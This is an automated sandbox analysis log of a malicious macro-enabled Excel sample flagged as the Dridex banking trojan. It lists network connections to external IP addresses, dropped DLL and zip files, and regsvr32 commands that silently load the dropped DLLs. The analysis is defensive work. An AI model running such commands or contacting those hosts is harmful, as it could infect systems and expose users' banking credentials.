Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50021
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50021 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50044
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 50044 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866

Source: unknown	HTTPS traffic detected: 74.220.219.210:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.171.244.207:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.41.153:443 -> 192.168.2.4:49841 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.4:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.4:49865 version: TLS 1.2

E-Banking Fraud:

Detected Dridex e-Banking trojan

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B851A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FC51A7 OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,OutputDebugStringA,Sleep,OutputDebugStringA,GetAdaptersInfo,

System Summary:

Document contains an embedded VBA macro which may execute processes

Show sources

Source: VBA code instrumentation

OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: sample20210111-01.xlsm	Initial sample: CALL
Source: sample20210111-01.xlsm	Initial sample: CALL
Source: sample20210111-01.xlsm	Initial sample: CALL
Source: sample20210111-01.xlsm	Initial sample: CALL

Office process drops PE file

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\dunjzsby.dll	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\xnaitann.dll	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\u8wa3gh[1].zip	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\dvnrlttv[1].zip	Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B922A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BABE30 NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD22A0 NtDelayExecution,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FEBE30 NtClose,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B86AD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B967C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA5CB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9E0A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BADCA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA4CA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA50A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B998DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B8ACD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9A0D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B988C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B98CC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9D030
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA1020
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B82C45
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B8F9A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9D980
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BAD180
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA89F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA71F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9FDD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B81570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B97564
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B98AB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA26B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9AE80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9B6F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B98EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA62F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9F6E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B996D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA3EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BAFA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA0220
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BAD620
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B8CA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BAFA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B89E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B99E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9A660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA7660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA2E60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA1240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9E3F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B983C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B97FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA7FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA1730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA9B10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00BA3B00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B95B60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_00B9BF50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FC6AD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD67C8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDB6F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD8EF0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE62F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE52E6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDF6E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD96D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FEFA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE3EC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD8AB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE26B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE1EB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDAE80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FC9E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD9E70
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDA660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE7660
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE2E60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE1240
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE0220
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FED620
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FCCA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FEFA10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDE3F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD83C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD7FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE7FC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD5B60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDBF50
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE1730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE9B10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE3B00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD98DA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FCACD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDA0D0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD88C0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD8CC0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE5CB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDE0A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FEDCA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE4CA0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FC2C45
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDD030
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE1020
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE89F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FE71F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDFDD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FCF9A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDC590
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FDD980
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FED180
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FC1570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 18_2_02FD7564

Source: sample20210111-01.xlsm	OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation	OLE, VBA macro: Module Sheet1, Function view_1_a_Layout

Source: sample20210111-01.xlsm

OLE indicator, VBA macros: true

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mkmanoo.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll

Source: classification engine

Classification label: mal100.bank.expl.evad.winXLSM@9/19@3/7

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{A1C10B6F-1451-4F4E-B798-25D5A2E05EB3} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Windows\SysWOW64\regsvr32.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: sample20210111-01.xlsm	Virustotal: Detection: 26%
Source: sample20210111-01.xlsm	ReversingLabs: Detection: 32%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll.
Source: unknown	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\dunjzsby.dll.
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\xnaitann.dll.
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll.
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\dunjzsby.dll.
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\xnaitann.dll.

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: sample20210111-01.xlsm	Initial sample: OLE zip file path = xl/media/image2.png
Source: sample20210111-01.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Source: sample20210111-01.xlsm

Initial sample: OLE indicators vbamacros = False

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 16_2_10002140 LoadLibraryA,GetProcAddress,VirtualAlloc,VirtualAlloc,VirtualAlloc,

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\mkmanoo.dll.

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000400A push esi; retf
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_10010810 pushfd ; retf
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000D856 push ebp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000E8F3 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_10002140 push ecx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1001CD9B push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000C265 push 588A19FDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_10020A73 push edx; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000FEBF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000FEFA push 00000000h; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_10023EFF push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000C304 push 588A1BCDh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_10010307 push esp; retf
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000CF15 push 0000002Dh; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1001DB23 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_10020B27 push eax; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_1000DFC7 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_10023FEB push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 16_2_100107FB pushfd ; retf

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\dunjzsby.dll	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Temp\xnaitann.dll	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\u8wa3gh[1].zip	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\dvnrlttv[1].zip	Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\u8wa3gh[1].zip			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\dvnrlttv[1].zip			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
